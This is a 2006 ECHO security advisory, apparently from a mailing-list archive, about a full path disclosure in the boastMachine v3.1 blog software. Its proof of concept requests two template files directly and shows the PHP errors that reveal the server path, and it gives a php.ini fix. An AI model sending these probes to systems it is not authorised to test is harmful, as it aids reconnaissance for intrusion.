[ECHO_ADV_25$2006] Full path disclosure on boastMachine v3.1

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

					.OR.ID
ECHO_ADV_25$2006

---------------------------------------------------------------------------
         [ECHO_ADV_25$2006] Full path disclosure on boastMachine v3.1 
---------------------------------------------------------------------------

Author       : M.Hasran Addahroni
Date         : January, 5th 2006
Location     : Indonesia
Web          : http://echo.or.id/adv/adv26-K-159-2006.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BoastMachine

version    : v3.1
Vendor     : http://boastology.com
Description: boastMachine is an aplication software to built blog, support
with mysql and php

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~
In the folder /templates/default/ A remote user can access footer.php and side_menu.php directly to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker

    
Proof of Concept:
~~~~~~~~
 (i) http://victim/[boastMachine_path]/templates/default/side_menu.php 
  
  http://localhost/blog/templates/default/side_menu.php

  Warning: Failed opening 'CFG_ROOT/calendar.php' for inclusion  (include_path='.:/usr/lib/php') in 
 /var/www/html/blog/templates/default/side_menu.php on line 3

  Fatal error: Call to undefined function: bmc_show_list() in 
  /var/www/html/blog/templates/default/side_menu.php  on line 10

  
 (ii) http://victim/[boastMachine_path]/templates/default/footer.php
   
   http://localhost/blog/templates/default/footer.php

   Warning: Failed opening 'CFG_ROOT/reflog.php' for inclusion (include_path='.:/usr/lib/php') in
  /var/www/html/blog/templates/default/footer.php on line 20

   Warning: Failed opening 'CFG_ROOT/users_online.php' for inclusion (include_path='.:/usr/lib/php') in 
  /var/www/html/blog/templates/default/footer.php on line 23

Solution:
~~~~~~~~~
For User and do not know how to fix the script , change php.ini file setting then turn on log_errors , and turn off display_error

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, the_day, c-a-s-e, S`to, lirva32, anonymous
~ masterpop3, biatch-x, bithedz, Lieur-Euy, mr_Ny3m, maSter-oP, stev, sinChan, cowok_1seng, x`shell, m_beben, etc
~ newbie_hacker@xxxxxxxxxxxxxxx 
~ #e-c-h-o, #aikmel @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux